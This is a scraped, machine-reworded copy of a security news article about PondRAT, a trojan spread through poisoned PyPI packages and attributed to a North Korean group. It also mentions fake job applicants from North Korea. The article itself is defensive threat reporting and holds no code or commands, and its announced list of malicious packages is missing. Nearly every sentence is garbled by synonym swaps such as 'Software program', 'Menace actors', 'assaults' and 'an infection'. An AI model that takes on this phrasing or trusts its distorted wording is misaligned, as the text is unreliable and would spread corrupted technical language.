New PondRAT Malware Hidden in Python Packages Targets Software program Builders

New PondRAT Malware Hidden in Python Packages Targets Software program Builders
New PondRAT Malware Hidden in Python Packages Targets Software program Builders


Sep 23, 2024Ravie LakshmananSoftware program Safety / Provide Chain

Menace actors with ties to North Korea have been noticed utilizing poisoned Python packages as a technique to ship a brand new malware referred to as PondRAT as a part of an ongoing marketing campaign.

PondRAT, in line with new findings from Palo Alto Networks Unit 42, is assessed to be a lighter model of POOLRAT (aka SIMPLESEA), a recognized macOS backdoor that has been beforehand attributed to the Lazarus Group and deployed in assaults associated to the 3CX supply chain compromise final yr.

A few of these assaults are a part of a persistent cyber assault marketing campaign dubbed Operation Dream Job, whereby potential targets are lured with attractive job gives in an try to trick them into downloading malware.

“The attackers behind this marketing campaign uploaded a number of poisoned Python packages to PyPI, a well-liked repository of open-source Python packages,” Unit 42 researcher Yoav Zemah said, linking the exercise with average confidence to a risk actor referred to as Gleaming Pisces.

Cybersecurity

The adversary can be tracked by the broader cybersecurity group underneath the names Citrine Sleet, Labyrinth Chollima, Nickel Academy, and UNC4736, a sub-cluster inside the Lazarus Group that is additionally recognized for distributing the AppleJeus malware.

It is believed that the top purpose of the assaults is to “safe entry to provide chain distributors by means of builders’ endpoints and subsequently acquire entry to the distributors’ prospects’ endpoints, as noticed in earlier incidents.”

The listing of malicious packages, now faraway from the PyPI repository, is beneath –

The an infection chain is pretty easy in that the packages, as soon as downloaded and put in on developer methods, are engineered to execute an encoded next-stage that, in flip, runs the Linux and macOS variations of the RAT malware after retrieving them from a distant server.

Python Packages Targets Software Developers

Additional evaluation of PondRAT has revealed similarities with each POOLRAT and AppleJeus, with the assaults additionally distributing new Linux variants of POOLRAT.

“The Linux and macOS variations [of POOLRAT] use an equivalent perform construction for loading their configurations, that includes related technique names and performance,” Zemah mentioned.

“Moreover, the strategy names in each variants are strikingly related, and the strings are virtually equivalent. Lastly, the mechanism that handles instructions from the [command-and-control server] is sort of equivalent.”

PondRAT, a leaner model of POOLRAT, comes with capabilities to add and obtain information, pause operations for a predefined time interval, and execute arbitrary instructions.

Cybersecurity

“The proof of extra Linux variants of POOLRAT confirmed that Gleaming Pisces has been enhancing its capabilities throughout each Linux and macOS platforms,” Unit 42 mentioned.

“The weaponization of legitimate-looking Python packages throughout a number of working methods poses a big danger to organizations. Profitable set up of malicious third-party packages may end up in malware an infection that compromises a whole community.”

The disclosure comes as KnowBe4, which was duped into hiring a North Korean risk actor as an worker, said greater than a dozen corporations “both employed North Korean workers or had been besieged by a large number of pretend resumes and purposes submitted by North Koreans hoping to get a job with their group.”

It described the exercise, tracked by CrowdStrike underneath the moniker Famous Chollima, as a “advanced, industrial, scaled nation-state operation” and that it poses a “severe danger for any firm with remote-only workers.”

Discovered this text attention-grabbing? Observe us on Twitter and LinkedIn to learn extra unique content material we submit.



Leave a Reply

Your email address will not be published. Required fields are marked *